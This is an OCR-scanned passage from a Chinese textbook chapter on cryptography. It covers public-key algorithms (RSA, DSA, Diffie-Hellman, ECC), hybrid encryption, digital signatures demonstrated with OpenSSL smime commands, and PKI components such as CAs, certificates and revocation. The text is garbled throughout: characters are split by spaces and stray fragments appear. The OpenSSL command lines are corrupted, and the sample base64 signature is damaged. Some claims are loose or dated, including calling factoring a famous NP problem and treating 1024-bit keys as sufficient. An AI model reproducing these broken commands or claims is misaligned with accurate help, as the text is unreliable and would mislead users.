在 《密码 学 的 新 方向 ) 一 文中 提出 了 公开 密 钥 密码 体制 的 思想 ,开创 了 现代 密码 学 的 新 领域 。 
与 对 称 加 密 算法 不 同 , 非 对 称 加 密 算 法 需要 两 个 密 钥 : 公开 密 钥 (Public Key) FUR 95 8] 
(Private Key) 。 公 开 密 钥 与 私有 密 钥 是 一 对 ,如 果 用 公开 密 钥 对 数据 进行 加 密 , 只 有 用 对 
应 的 私有 密 钥 才能 解密 ; 如 果 用 私有 密 钥 对 数据 进行 加 密 ,那么 只 有 用 对 应 的 公开 密 钥 才 
能 解密 。 因 为 加 密 和 解密 使 用 的 是 两 个 不 同 的 密 钥 ,所 以 这 种 算法 称 为 非 对 称 加 密 算法 。 
基本 原理 如 下 。 

假定 有 两 个 用 户 A 和 B, 每 个 用 户 都 有 两 个 密 钥 : 公开 密 钥 PA、PB 和 私有 密 钥 SA、 
SB; 由 公开 密 钥 P 无 法 求 得 私有 密 钥 S。 当 A 要 给 B 发 送信 息 时 , 它 用 公开 密 钥 PB 加 密 
信息 ,然后 将 密 文 发 送 给 B.B 用 私有 密 钥 SB 对 密 文 进行 解密 ,得 出 明文 。 因 为 SB 是 保密 
的 ,除了 B 之 外 ,其 他 人 无 法 得 到 或 求 出 ,从 而 满足 了 保密 性 要 求 。 
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可 是 真实 性 无 法 保证 ,因为 PB 是 公开 的 ,任何 人 都 可 以 自称 是 用 户 A, 向 B 发 送 仿造 
的 密 文 。 为 了 实现 真实 性 要 求 ,A 可 以 用 自己 的 私有 密 钥 SA 加 密 信息 ,得 到 A 签名 的 文 
件 , 然 后 发 送 给 B,B 收 到 后 用 A 的 公开 密 钥 PA 验证 其 真实 性 。 除 了 A 之 外 ,其 他 人 都 不 
知道 SA, 因 此 无 法 冒充 A, 这 就 保证 了 信息 确实 是 A 发 出 的 ,也 保证 了 真实 性 。 

对 于 单 钥 体 制 存在 的 问题 ,采用 双 钥 密码 体制 则 可 以 完全 克服 ,特别 是 多 用 户 通信 网 ， 
双 钥 密码 体制 可 以 明显 减少 多 用 户 之 间 所 需 的 密 钥 量 ,从 而 便于 密 钥 管 理 。 采 用 双 钥 密码 
体制 的 主要 特点 是 将 加 密 和 解密 功能 分 开 , 因 而 可 以 实现 多 个 用 户 加 密 的 消息 只 能 由 一 个 
用 户 解读 ,或 只 能 由 一 个 用 户 加 密 消息 而 使 多 个 用 户 可 以 解读 。 非 对 称 加 密 算法 的 出 现 可 
以 有 效 地 解决 使 用 对 称 加 密 算法 时 密 钥 分 发 与 管理 的 安全 隐患 。 

双 钥 密码 体制 的 优点 是 可 以 公开 加 密 密 钥 ,适应 网 络 的 开放 性 要 求 , 且 仅 需 要 保密 解密 
密 钥 ,所 以 密 钥 管理 问题 比较 简单 。 此 外 , 双 钥 密码 可 以 用 于 数字 签名 等 新 功能 。 主 要 的 非 
对 称 加 密 算法 有 RSA、DSA、DH fil ECC, 

1. RSA 算法 

目前 应 用 最 广泛 的 非 对 称 加 密 算法 是 RSA ,其 名 称 来 自 于 3 个 发 明 者 的 姓名 首 字母 。 
在 1978 年 ,由 美国 麻 省 理工 学 院 的 R. L. Rivest, A. Shamir 和 L. Adleman 在 题 为 《获得 数 
字 签 名 和 公开 钥 密码 系统 的 方法 》 的 论文 中 提出 。 它 是 一 个 基于 数论 的 非 对 称 ( 公 开 钥 ) 密 
码 体制 ,是 一 种 分 组 密码 体制 。 它 的 安全 性 是 基于 大 整数 因子 分 解 的 困难 性 ,而 大 整数 因子 
分 解 问题 是 数学 上 的 著名 NP 问题 ,至 今 没有 有 效 的 方法 予以 解决 ,因此 可 以 确保 RSA 算 
法 的 安全 性 。RSA 系统 是 公 钥 系统 的 最 具有 典型 意义 的 方法 ,大 多 数 使 用 公 钥 密码 进行 加 
密 和 数字 签名 的 产品 和 标准 使 用 的 都 是 RSA 算法 。 

RSA 算法 是 第 一 个 既 能 用 于 数据 加 密 也 能 用 于 数字 签名 的 算法 ,因此 它 为 公用 网 络 上 
信息 的 加 密 和 鉴别 提供 了 一 种 基本 的 方法 。 它 通常 是 先生 成 一 对 RSA 密 钥 ,一 个 是 私有 密 
钥 ,由 用 户 保存 ; 另 一 个 是 公开 密 钥 ,可 对 外 公开 ,用 对 方 的 公 钥 加 密 文件 后 发 送 给 对 方 , 对 
方 就 可 以 用 私 钥 解密 。 

RSA 体制 既 可 用 于 加 密 , 也 可 用 于 数字 签名 。RSA 得 到 了 世界 上 的 最 广泛 应 用 ,ISO 
在 1992 年 颁布 的 国际 标准 X. 509 中 ,将 RSA 算法 正式 纳入 国际 标准 。1999 年 ,美国 参议 
院 已 经 通过 了 立法 ,规定 电子 数字 签名 与 手写 签名 的 文件 .邮件 在 美国 具有 同等 的 法 律 效 
力 。 在 Internet 中 广泛 使 用 的 电子 邮件 和 文件 加 密 软件 PGPCPretty Good Privacy) 也 将 
RSA 作为 传送 会 话 密 钥 和 数字 签名 的 标准 算法 。 

2. DSA 算法 

DSA(Digital Signature Algorithm ,数字 签名 算法 ,用 做 数字 签名 标准 的 一 部 分 ) , 它 是 
另 一 种 公开 密 钥 算 法 , 它 不 能 用 做 加 密 , 只 用 做 数字 签名 。DSA 使 用 公开 密 钥 ,为 接收 者 验 
证 数据 的 完整 性 和 数据 发 送 者 的 身份 。 它 也 可 用 于 由 第 三 方 去 确定 签名 和 所 签 数据 的 真实 
性 。DSA 算法 的 安全 性 基于 解 离散 对 数 的 困难 性 ,这 类 签字 标准 具有 较 大 的 兼容 性 和 适用 
性 ,成 为 网 络 安全 体系 的 基本 构件 之 一 。 

3. Diffie-Hellman 密 钥 交换 

DH 算法 是 W. Diffie 和 M. Hellman 提出 的 。 此 算法 是 最 早 的 公 钥 算法 。 它 实质 上 是 
一 个 通信 双方 进行 密 钥 协定 的 协议 : 两 个 实体 中 的 任何 一 个 使 用 自己 的 私 钥 和 另 一 实体 的 
公 钥 ,得 到 一 个 对 称 密 钥 ,这 一 对 称 密 钥 其 他 实体 都 计算 不 出 来 。DH 算法 的 安全 性 基于 有 
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限 域 上 计算 离散 对 数 的 困难 性 。 离 散 对 数 的 研究 现状 表明 : 所 使 用 的 DH 密 钥 至 少 需要 
1024 位 ,才能 保证 有 足够 的 中 .长 期 安全 。 

4. 椭圆 曲线 密码 体制 (ECC) 

1985 4E,N. Koblitz 和 V. Miller 分 别 独 立 提出 了 椭圆 曲线 密码 体制 (ECC) ,其 依据 就 
是 定义 在 椭圆 曲线 点 群 上 的 离散 对 数 问题 的 难 解 性 。 

非 对 称 加 密 算 法 的 最 大 优点 就 是 不 需要 对 密 钥 通信 进行 保密 ,所 需 传 输 的 只 有 公开 密 
钥 。 这 种 密 钥 体制 也 可 以 用 于 数字 签名 。 公 开 密 钥 体 制 的 缺点 在 于 加 密 和 解密 的 运算 时 间 
很 长 ,在 加 密 大 量 数 据 的 应 用 中 受 限 ,这 在 一 定 程度 上 限制 了 它 的 应 用 范围 。 


3.4.5 混合 加 密 体 制 算 法 


双 钥 密码 的 缺点 是 密码 算法 一 般 比 较 复杂 ,加 、 解 密 速度 较 慢 。 因 此 ,实际 网 络 中 的 加 
密 多 采用 双 钥 和 单 钥 密 码 相 结 合 的 混合 加 密 体制 , 即 加 解密 时 采用 单 钥 密 码 , 密 钥 传 送 则 采 
用 双 钥 密码 。 这 样 既 解 决 了 密 钥 管理 的 困难 ,又 解决 了 加 、 解 密 速度 的 问题 。 


35 数字 签名 


数字 签名 技术 是 实现 交易 安全 的 核心 技术 之 一 , 它 的 实现 基础 就 是 加 密 技 术 。 数 字符 
名 能 够 实现 电子 文档 的 辨认 和 验证 。 数 字 签名 是 对 传统 文件 手写 签名 的 模拟 ,能 够 实现 用 
户 对 电子 形式 存放 消息 的 认证 。 


3.5.1 数字 签名 概述 


基本 原理 : 使 用 一 对 不 可 互相 推导 的 密 钥 ,一 个 用 于 签名 (加 密 ), 一 个 用 于 验证 ( 解 
密 ) ,签名 者 用 加 密 密 钥 (保密 ) 签 名 (加 密 ) 文 件 , 验 证 者 用 (公开 的 ) 解 密 密 钥 解密 文件 ,确定 
文件 的 真 伪 。 数 字 签 名 与 加 、 解 密 过 程 相反 。 散 列 函 数 是 数字 签名 的 一 个 重要 辅助 工具 。 


基本 要 求 如 下 。 

COD 可 验证 。 签 名 是 可 以 被 确认 的 ,对 于 签名 的 文件 ,一 旦 发 生 纠 纷 ,任何 第 三 方 都 可 
以 准确 ,有效 地 进行 验证 。 

(2) 防 抵 赖 。 这 是 对 签名 者 的 约束 ,签名 者 的 认同 、 证 明 、 标 记 是 不 可 否认 的 ,发 送 者 事 
后 不 能 不 承认 发 送 文件 并 签名 。 


CD 防 假 冒 。 攻 击 者 冒充 发 送 者 向 收 方 发 送 文件 。 

(4) 防 算 改 。 文 件 签名 后 是 不 可 改变 的 ,这 保证 了 签名 的 真实 性 、 可 靠 性 。 

O) 防伪 造 。 签 名 是 签名 者 对 文件 内 容 合 法 性 的 认同 .证 明和 标记 ,其 他 人 签名 无 效 。 
(6) 防 重复 。 签 名 需要 时 间 标 记 , 这 样 可 以 保证 签名 不 可 重复 使 用 。 


3.5.2 实例 : 数字 签名 


数字 签名 允许 数据 的 接收 者 用 以 确认 数据 的 来 源 和 数据 的 完整 性 ,并且 保护 数据 ,防止 
被 人 (包括 接收 者 ) 伪 造 。 
本 节 以 3.4. 3 小 节 的 中 OpenSSL 部 分 为 基础 。 
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1. 文件 的 数字 签名 
文件 的 签发 人 执行 如 下 命令 对 文件 进行 openssl_test. txt 数字 签名 ,签名 后 的 文件 为 


openssl_test. sig. 


[root @ localhost misc] € -—-/openssl/bin/openssl smime - sign - inkey private_key. pem 一 
signer public key.pem — in openssl test.txt — out openssl test.sig 


执行 如 下 命令 查看 签名 后 文件 openssl_test. sig 的 内 容 , 如 图 3-93 所 示 。 


MIME-Version: 1.0 
Content-Type: multipart/signed; protocol-"application/x-pkcs7-signature", micalg-shal; boun 
dary-"----B5F53AF92C9B89AF97CCAEDD323AD481* 


This is an S/MIME signed message 


B5F53AF92C9B89AFS7CCAEDD323AD481 
Content-Type: application/x-pkcs7-signature; name-"smime.p7s" 
Content-Transfer-Encoding: base64 
Content-Disposition: attachment, filename-"smime.p7s" 


MIIGWgYJK oZIhvcN AQcCoIIGSzCCBkcCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3 
DQEHAaCCASkwggPVMIICvaADAgECAgEBMAOGCSqGSIb3DQEBBQUAMGKxCzAJBgNV 
BAYTAkNOMQswCQYDVQQIEwJITjEMMAoGA IUECRMDWFhVMQwwCgYDVQQLEwNKU0ox 
EDAOBgNVBAMTB3p0Z3VhbmcxHzA dBgkahkiG9wOBCQEWEGpzam9zY 3B | QDE2My5j 
b20wHhcNMDcxMjAOMTczODAxWhcNMDgxMjAzMTczODAxWjB2MQswCQYDVQQGEwJD 
TjELMAkGA1UECBMCSEAxCzAJBgNVBAcTAIh Y MQwwCgYDVQQKEwNY WFUzDDAKBgNV 
BAsTAOpTSjEQMA4GA IUEAxMHenRndWFuZzEfMBOGCSqGSIb3DQEJARY QanNqb3Nj 
cHVAMTYzLmNvbTCCASIwDQ YJK oZlhvcNAQEBBQADggEPADCCAQoCggEBAK/xUONz 
LuwYTTvFzlytMB7P8JHyq7UPStzh9r/LEJrBCOWn62Mwnzy3G8uVped3V34F A7 
fkOXfArh7kIduNwW7f5UxinVeh3nwJrOg9SI70r7H0OXG9GUSB4uwCCNEIPOb9 Yi 
AXwSWIKS3EF-dHbjw8N2OtIvN5xsHE6ejUcs GDD6/HuU8A3rUgbx6RTS5aUuURxb 
uwdo4h7wLoTbEL7bs0YSZeLyvMtbaLnQRaq60Ju2qG2cux6aCLIK UR67bFRnzkmXK. 

openssl test.sig 


图 3-93 ”数字 签名 后 文件 openssl_test. sig 的 内 容 
[root(21ocalhost misc]it less openssl test.sig 


2. 验证 收 到 文件 的 数字 签名 
当 接收 方 收 到 这 份 数字 签名 的 文件 后 ,可 用 所 提供 的 公开 密 钥 (public_key. pem) fl CA 


证 书 (cacert. pem) 来 进行 验证 。 
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接收 方 执行 如 下 命令 进行 验证 ,同时 会 将 原始 内 容 存 入 openssl test t. txt 文件 。 


[root @ localhost misc] # -—-/openssl/bin/openssl smime - verify - in openssl test. sig 一 
signer public key.pem — out openssl test t.txt ~ CAfile ./demoCA/cacert. pem 

Verification successful( 此 行 是 上 面 命令 的 执行 结果 ,表明 数字 签名 是 正确 的 ) 

[root(2localhost misc] # dir 

CA. pl c info demoCA openssl test t.txt private key. pem 

CA. sh Cc issuer  openssl test.enc  openssl test.txt private req.pem 

c hash c name openssl test.sig  openssl test.txt.old public key.pem 
[root(2localhost misc] # cat openssl test t.txt (查看 openssl test t.txt 文件 内 容 ) 
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adfkkjljdlgjlkjadfjal(openssl test t.txt 文件 内 容 ) 


不 会 降低 签名 的 可 信 性 。 完 整 的 数字 签名 过 程 ( 如 图 3-94 所 示 ) 如 下 。 

(1) 发 方 将 原文 用 哈 希 算法 得 数字 摘要 。 

(2) 用 发 方 的 签名 私 钥 对 数字 摘要 加 密 ,得 到 数字 签名 。 

(3) 发 方 将 原文 与 数字 签名 一 起 发 送 给 接收 方 。 

(4) 接收 方 验证 签名 , 即 发 方 用 验证 公 钥 解密 数字 签名 ,获得 数字 摘要 。 

(5) 收 方 将 原文 采用 同样 哈 希 算法 获得 一 个 新 数字 摘要 。 

C60 将 两 个 数字 摘要 进行 比较 ,如 果 二 者 匹配 ,说 明 原文 没 被 修改 。 

因此 ,数字 签名 给 接收 者 提供 一 种 保证 : 被 签名 的 数据 仅 来 自 签名 者 ,而 且 自 从 数字 被 
签名 后 就 没 被 修改 过 。 这 里 要 特别 提醒 一 点 : 数字 签名 可 以 保证 数据 没 被 修改 过 ,但 不 能 
保证 数据 不 被 未 经 授权 的 人 阅读 。 


接收 方 


原文 


数据 摘要 


方 的 pr 
私 钥 


图 3-94 数字 签名 过 程 
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随 着 互联 网 技术 的 迅速 推广 和 普及 ,各 种 网 络 应 用 ,比如 电子 商务 、 电 子 政务 、 网 上 银行 
及 网 上 证 券 等 金融 业 网 上 交易 业务 也 在 迅速 发 展 。 但 是 ,互联 网 在 安全 上 的 弱势 又 成 为 人 
们 担心 的 焦点 ,比如 网 络 上 非法 入 侵 、 诈 骗 等 ,因此 ,如 何 解决 网 络 信 息 的 安全 问题 ,已 经 成 
为 发 展 网 络 通 信和 的 重要 任务 。 目 前 对 网 络 安全 服务 能 够 提供 强 有 力 保证 的 技术 是 公 钥 基础 
设施 PKI(Public Key Infrastructure)。PKI 是 在 公开 密 钥 加 密 技术 的 基础 上 形成 和 发 展 起 
来 的 。 

1. 什么 是 PKI 

PKI 是 在 公开 密 钥 加 密 技术 基础 上 形成 和 发 展 起 来 的 提供 安全 服务 的 通用 性 基础 平 
台 , 用 户 可 以 利用 PKI 基础 平台 所 提供 的 安全 服务 ,在 网 上 实现 安全 的 通信 。PKI 采用 标 
准 的 密 钥 管理 规则 ,能 够 为 所 有 应 用 透明 地 提供 采用 加 密 和 数字 签名 等 密码 服务 所 需要 的 
密 钥 和 证 书 管理 。 
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也 有 人 将 PKI 定 义 为 : 它 是 创建 ,颁发 .管理 和 撤销 公 钥 证 书 所 涉及 的 所 有 软件 、 硬 件 
系统 ,以 及 所 涉及 的 整个 过 程 安全 策略 规范 、 法 律 法 规 和 人 员 的 集合 。 其 中 证 书 是 PKI 的 
核心 元 素 ,CA 是 PKI 的 核心 执行 者 。 

使 用 基于 PKI 基础 平台 的 用 户 建立 安全 通信 相互 信任 的 基础 如 下 。 

第 一 ,网 上 进行 的 任何 需要 提供 安全 服务 的 通信 都 是 建立 在 公 钥 的 基础 之 上 的 , 公 钥 是 
可 以 对 外 公开 的 。 

第 二 ,与 公 钥 成 对 的 私 钥 ( 私 有 密 钥 ) 只 能 掌握 在 与 他 们 通信 的 另 一 方 手中 , 私 钥 必 须 自 
己 严密 保管 ,不 得 泄露 。 

第 三 ,这 个 信任 的 基础 是 通过 公 钥 证 书 的 使 用 来 实现 的 。 公 钥 证 书 就 是 一 个 用 户 在 网 
上 的 身份 证 明 ,是 用 户 身份 与 他 所 持 有 公 钥 的 绑 定 结合 ,在 这 种 绑 定之 前 , 巾 一 个 可 信任 的 
认证 机 构 CA 来 审查 和 证 实用 户 的 身份 ,然后 认证 机 构 CA 将 用 户 身份 及 其 公 钥 结合 起 来 ， 
形成 数字 证 书 , 并 进行 数字 签名 ,实现 证 书 和 身份 唯一 对 应 ,以 证 明 该 证 书 的 有 效 性 ,同时 证 
明了 网 上 身份 的 真实 性 。 

2. PKI 的 组 成 

CD 认证 机 构 CA(CCertificate Authority) 

认证 机 构 CA 是 PKI 的 核心 执行 机 构 , 是 PKI 的 主要 组 成 部 分 ,在 业界 通常 把 它 称 为 
认证 中 心 。 它 是 一 种 信任 机 构 ,因为 证 书 将 公 钥 和 它 的 持 有 人 关联 起 来 了 ,但 是 如 何 知 道 证 
书 中 的 信息 是 可 靠 的 呢 ? 如 何 知道 其 中 公 钥 与 其 持 有 人 之 间 的 关联 是 正确 的 呢 ? 这 就 由 
CA 来 保证 证 书 中 的 信息 的 正确 性 。CA 的 主要 职责 是 确认 证 书 持 有 人 的 身份 。 证 书 经 CA 
数字 签名 并 颁发 ,以 证 明证 书包 含 的 公 钥 属于 证 书 持 有 人 。 因 此 ,通过 可 信赖 的 第 三 方 , 信 
任 CA 的 任何 人 也 将 信赖 证 书 持 有 人 的 公 钥 。 

CA 是 保证 电子 商务 .电子 政务 `. 网 上 银行 .网 上 证 券 等 交易 的 权威 性 .可 信任 性 和 公正 
性 的 第 三 方 机 构 。 

CA 由 以 下 三 部 分 组 成 ,如 图 3-95 所 示 是 中 国 金融 CA 结构 的 组 成 。 


根 CA 商业 银行 n 总 行 RA 中 心 
I l 
政策 CA 分 行 RA 中 心 ! | | 分 行 RA 中 心 2| … | 分行 RA 中 心 m 
I 1 I 
商业 银行 1 OCA | | 商业 银行 2 OCA | … | 商业 银行 2 OCA | | LRA 受 理 点 | | LRA 受 理 点 LRA 受 理 点 
中 国 金 融 CA 结 RA 结 构 


图 3-95 ”中国 金融 CA 结构 .RA 结构 


(D 第 一 级 是 根 CA ,负责 总 政策 。 

© 第 二 级 是 政策 CA ,负责 制定 具体 认证 策略 。 

© 第 三 级 为 操作 CA(OCA), 是 证 书签 发 和 发 布 机 构 。 

CA 从 广义 上 说 还 应 包括 证 书 注册 审批 机 构 RA(Registration Authority), 它 是 数字 证 
书 的 申请 注册 .证 书签 发 和 管理 机 构 。RA 系统 是 CA 的 证 书 发 放 和 管理 的 延伸 , 它 负 责 证 
书 申 请 者 的 信息 录入 、 审 核 以 及 证 书 发 放 等 工作 ; 同时 ,对 发 放 的 证 书 完成 相应 的 管理 功 
能 ; 发 放 的 数字 证 书 可 以 存放 于 IC 卡 、 硬 盘 或 软盘 等 介质 中 ; RA 系统 是 整个 CA 系统 得 
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以 正常 运营 不 可 缺少 的 一 部 分 。 

RA 的 组 成 如 图 3-95 所 示 ,RA 中 心 负责 证 书 申请 注册 的 汇总 ; LRA 为 远程 本 地 受理 
点 ,负责 用 户 证 书 的 申请 受理 。 

PKI 服务 系统 的 关键 问题 是 如 何 实 现 公 钥 的 管理 。 因 为 公 钥 是 公开 的 ,需要 在 网 上 传 
输 。 目 前 较 好 的 解决 方案 是 引进 证 书 机 制 。 证 书 是 公开 密 钥 体制 的 一 种 密 钥 管理 媒介 。 它 
是 一 种 权威 性 的 电子 文档 , 形 同 网 络 计算 环境 中 的 一 种 身份 证 ,用 于 证 明 某 一 主体 (如 人 、 服 
务 器 等 ) 的 身份 及 其 公开 密 钥 的 合法 性 。 在 使 用 公 钥 体制 的 网 络 环境 中 ,必须 向 公 钥 使 用 者 
证 明 公 钥 的 真实 合法 性 。 因 此 ,在 公 钥 体制 环境 中 ,必须 有 一 个 可 信 的 机 构 来 对 任何 一 个 主 
体 的 公 钥 进行 公证 ,证 明 主 体 的 身份 以 及 它 与 公 钥 的 匹配 关系 。CA 正 是 这 样 的 系统 , 它 的 
主要 功能 如 下 。 

CD 验证 并 标识 证 书 申请 者 的 身份 .对 证 书 申请 者 的 信用 度 、 申 请 证 书 的 目的 、 身 份 的 真 
实 可 靠 进行 审查 ,确保 证 书 与 身份 绑 定 的 正确 性 。 

© 确保 CA 用 于 签名 证 书 的 非 对 称 密 钥 的 质量 和 安全 性 ,为 了 防止 被 破译 ,CA 用 于 签 
名 的 私 钥 长 度 必须 具有 1024 位 以 上 ,并且 私 钥 必 须 由 硬件 卡 产 生 , 私 钥 不 出 卡 。 

© 对 证 书信 息 资 料 的 管理 ,如 证 书 序号 和 CA 标识 的 管理 ,确保 证 书 主体 标识 的 唯一 
性 ,防止 证 书 主体 的 名 字 重 复 。 

CD 在 证 书 使 用 中 确定 并 检查 证 书 的 有 效 期 ,保证 不 使 用 过 期 作废 证 书 , 确 保 网 上 交易 
的 安全 。 

© 发 布 和 维护 作废 证 书 列 表 (CRL), 因 某 种 原因 证 书 要 作废 ,就 必须 将 其 作为 “ 黑 名 
单 ? 发 布 在 证 书 作废 列表 中 ,以 供 交 易 时 在 线 查询 ,防止 交易 风险 。 

© 对 已 签发 证 书 的 使 用 全 过 程 进行 监视 跟踪 ,并 做 全 程 日 志 记录 ,以 备 发 生 交易 争端 
时 提供 公正 依据 ,并 参与 仲裁 。 

CA 为 了 实现 其 功能 ,主要 由 三 个 部 分 组 成 。 

CD 注册 服务 器 : 通过 Web Server 建立 的 站 点 ,可 为 客户 提供 每 日 24 小 时 的 服务 。 因 
此 ,客户 可 以 在 自己 方便 时 在 网 上 提出 证 书 申请 和 填写 相应 的 证 书 申请 表 , 免 去 排队 等 候 的 
烦恼 。 

Q 证 书 申请 受理 和 审核 机 构 : 负责 证 书 的 申请 和 审核 。 它 的 主要 功能 是 接受 客户 证 
节 申 请 并 进行 审核 。 

@ 认证 中 心服 务 器 : 是 数字 证 书生 成 、 发 放 的 运行 实体 ,同时 提供 发 放 证 书 的 管理 .证 
书 废止 列表 (CRL) 的 生成 和 处 理 等 服务 。 

(2) 证 书 和 证 书库 

O 证 书 。 证 书 是 数字 证 书 或 电子 证 书 的 简称 , 它 符合 X. 509 标准 ,是 网 上 实体 身份 的 
证 明 , 证 明 某 一 实体 的 身份 以 及 其 公 钥 的 合法 性 .证 明 该 实体 与 公 钥 的 匹配 关系 。 证 书 在 公 
钥 体 制 中 是 密 钥 管理 的 媒介 ,不 同 的 实体 可 以 通过 证 书 来 互相 传递 公 钥 ; 证 书 是 由 具备 权 
威 性 、 可 信任 性 和 公正 性 的 第 三 方 机 构 签发 的 ,因此 , 它 是 权威 性 的 电子 文档 。 

证 书 的 主要 内 容 按 X. 509 标准 规定 其 逻辑 表达 式 为 : 

CA(A)— CA ! V,SN,AI,CA,UCA,A,UA,AP,TA ! 
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从 V 到 Ta 是 证 书 在 标准 域 中 的 主要 内 容 。 这 些 内 容 主 要 用 于 身份 认证 。 证 书 元 素 说 
明 见 表 3-6。 


表 3-6 证 书 元 素 说 明 


证 书 元 素 说 明 
CACA) 认证 机 构 CA 为 用 户 A 颁发 的 证 书 
CA t»! 认证 机 构 CA 对 花 括 弧 内 证 书 内 容 进行 的 数字 签名 
V 证 书 版 本 号 (Certificate Format Version) 
SN 证 书 序列 号 (Certificate Serial Number) 
AI 用 于 对 证 书 进 行 签名 的 算法 标识 (Signature Algorithm Identifier) 
CA 签发 证 书 的 CA 机 构 的 名 字 (Issuer Name) 
UCA 签发 证 书 的 CA 的 唯一 标识 符 
A 用 户 A 的 名 字 
UA 用 户 A 的 唯一 标识 
AP HP A 的 公 钥 
TA 证 书 的 有 效 期 


存放 证 书 的 介质 有 软盘 、 硬 盘 和 IC F ,一般 B2B 高 级 证 书 要 求 存放 在 IC 中 ,因为 证 书 
存放 在 IC 卡 中 私 钥 不 出 卡 , 安 全 性 高 .携带 方便 、 便 于 管理 。 

在 PKI 体系 中 ,可 以 采取 以 下 某 种 或 某 几 种 方式 获得 证 书 : 

第 一 ,发 送 者 发 送 签 名 信息 时 ,附加 发 送 自 己 的 证 书 ; 

第 二 ,单独 发 送 证 书信 息 的 通道 ; 

第 三 ,可 从 访问 发 布 证 书 的 目录 服务 器 获得 ; 

第 四 ,可 从 证 书 的 相关 实体 (如 RA) 处 获得 。 

目前 我 国 已 建成 中 国电 信 CA 安全 认证 体系 (CTCA)、 上 海 电 子 商务 CA 认证 中 心 
(SHECA) 和 中 国 金 融 认证 中 心 (CA) 等 。 

申请 的 数字 证 书 采用 公 钥 体制 。 用 户 设 定 一 把 特定 的 仅 为 本 人 所 有 的 私有 密 钥 ( 私 
HD ,用 它 进行 解密 和 签名 ; 同时 设 定 一 把 公共 密 钥 ( 公 钥 ) 并 由 本 人 公开 ,为 一 组 用 户 所 共 
享 , 用 于 加 密 和 验证 签名 。 数 字 证 书 可 用 于 : 安全 地 发 送 电 子 邮件 ; 访问 安全 站 点 、 网 上 招 
投标 、 网 上 签约 、 网 上 订购 、 安 全 网 上 公文 传送 、 网 上 办 公 、 网 上 缴费 、 网 上 购物 等 网 上 的 安全 
电子 事务 处 理 和 交易 。 

CA 自己 的 一 对 密 钥 的 管理 非常 关键 . 它 必 须 确 保 其 高 度 的 机 密 性 ,防止 他 人 伪造 证 
B. CA 的 公 钥 在 网 上 公开 ,整个 网 络 系统 必须 保证 完整 性 。CA 的 数字 签名 保证 了 证 书 
(实质 是 持 有 者 的 公 钥 ) 的 合法 性 和 权威 性 。 

用 户 产生 、 验 证 和 分 发 密 钥 可 以 有 下 面 两 种 方式 。 

第 一 ,用 户 自己 产生 密 钥 对 。 用 户 自己 生成 密 钥 对 ,然后 将 公 钥 以 安全 的 方式 传送 给 
CA ,该 过 程 必须 保证 用 户 公 钥 的 可 验证 性 和 完整 性 。 

第 二 ,CA 为 用 户 产 生 密 钥 对 。CA 替 用 户 生成 密 钥 对 ,然后 将 其 安全 地 传 给 用 户 ,该 过 
程 必须 确保 密 钥 对 的 机 密 性 、 完 整 性 和 可 验证 性 。 该 方式 下 由 于 用 户 的 私 钥 被 CA 所 知 , 故 
对 CA 的 可 信 性 要 求 更 高 。 
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第 3 章 ”密码 技术 


© 证 书库 。 由 于 证 书 的 不 可 伪造 性 ,因此 ,可 以 在 数据 库 中 公布 ,而 无 须 其 他 的 安全 措 
施 来 保护 这 些 证 书 。 通 常 的 做 法 是 将 证 书 和 证 书 撤销 信息 发 布 到 一 个 数据 库 ( 证 书库 ) 中 ， 
客户 端 可 以 通过 多 种 访问 协议 从 证 书库 实时 查询 证 书 和 证 书 撤销 信息 。 可 见 ,证 书库 是 
CA 颁发 证 书 和 撤销 证 书 的 集中 存放 地 ,是 网 上 的 一 种 公共 信息 库 , 供 广大 公众 进行 开放 式 
查询 。 一 般 来 说 ,查询 的 目的 有 两 个 : 一 是 要 想得到 与 之 通信 实体 的 公 钥 ; 一 是 要 验证 通 
信 对 方 的 证 书 是 否 已 进入 “ 黑 名 单 ”。 颁 发 证 书 和 撤销 证 书 的 集中 存放 地 ,实际 就 是 数据 库 ， 
通常 称 为 目录 服务 器 。 其 标准 格式 采用 X. 500, 目 录 查 询 协 议 为 LDAP, 客 户 端 软件 可 以 通 
过 这 种 协议 实时 查询 目录 服务 器 。 

证 书库 支持 分 布 式 存放 , 即 CA 机 构 所 签发 的 证 书 ,可 以 采用 数据 库 镜像 技术 ,将 其 中 
一 部 分 与 本 组 织 有 关 的 证 书 和 证 书 撤销 列表 存放 到 本 地 ,以 提高 证 书 的 查询 效率 ,减少 向 总 
目录 查询 的 瓶 席 。 当 PKI 所 支持 的 环境 扩充 到 几 十 万 个 或 上 百 万 个 用 户 时 ,PKI 信息 的 分 
布 机 制 就 显得 非常 关键 ,如 目录 服务 器 的 分 布 式 存放 ,这 是 任何 一 个 大 规模 的 PKI 系统 成 
功 实 施 的 基本 需求 ,也 是 创建 一 个 有 效 认 证 机 构 CA 的 关键 技术 之 一 。 

(3) 证 书 撤销 

认证 机 构 CA 通过 签发 证 书 来 为 用 户 的 身份 和 公 钥 进行 捆绑 ,但 因 种 种 原因 ,还 必须 存 
在 一 种 机 制 来 撤销 这 种 捆绑 关系 ,将 现行 的 证 书 撤销 。 比 如 ,在 用 户 身 份 姓名 改变 、 私 钥 被 
窃 或 泄露 ,用户 与 其 所 属 单位 关系 的 变更 时 ,就 需要 一 种 方法 警告 其 他 用 户 不 要 再 使 用 其 原 
来 的 公 钥 。 在 PKI 中 ,这 种 警告 机 制 被 称 作证 书 撤销 。 它 所 使 用 的 手段 为 证 书 撤销 列表 
(ERL: 

证 书 撤销 信息 的 更 新 和 发 布 频率 是 非常 重要 的 。 一 定 要 确定 合适 的 间隔 频率 来 发 布 证 
书 撤销 信息 ,并 且 要 将 这 些 信息 及 时 地 散发 给 那些 正在 使 用 这 些 证 书 的 用 户 。 两 次 证 书 撤 
销 信息 之 间 的 间隔 被 称 为 撤销 延迟 。 

证 书 撤销 的 实现 方法 有 很 多 种 。 一 种 方法 是 利用 周期 性 的 发 布 机 制 ,如 CRL, 这 是 常 
用 的 一 种 方法 ; 另 一 种 方法 是 在 线 查询 机 制 , 如 在 线 证 书 状 态 协议 OCSP, 它 是 一 种 相对 简 
单 的 请 求 响应 协议 。 一 个 OCSP 请 求 , 由 协议 版 本 号 、 服 务 请 求 类 型 及 一 个 或 多 个 证 书 标识 
符 组 成 。 

(4) 密 钥 备份 和 恢复 

密 钥 备份 及 恢复 是 密 钥 管理 的 主要 内 容 , 用 户 由 于 某 些 原 因 将 解密 数据 的 密 钥 丢失 ,已 
被 加 密 的 密 文 无 法 解 开 ,造成 数据 丢失 。 为 避免 这 种 情况 的 发 生 ,PKI 提供 了 密 钥 备份 与 密 
